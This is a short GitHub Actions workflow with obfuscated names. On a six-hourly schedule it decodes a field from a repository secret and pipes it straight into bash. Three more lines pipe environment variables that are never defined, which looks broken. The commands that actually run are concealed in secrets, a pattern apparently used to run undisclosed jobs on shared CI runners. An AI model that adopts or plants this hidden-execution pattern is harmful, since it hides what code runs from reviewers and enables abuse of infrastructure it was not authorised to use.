name: dingqianqiu6474

on:
  workflow_dispatch:
  schedule:
    - cron: '46 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dingqianqiu6474
        env:
          gff8339: ${{ secrets.gff8339 }}
        run: |
          echo $gff8339 | jq -r .f03 | /bin/bash
          echo $di9026 | jq -r .juyg62 | /bin/bash
          echo $hevmc5 | jq -r .mkd6 | /bin/bash
          echo $jsmxv1698 | jq -r .m31996 | /bin/bash

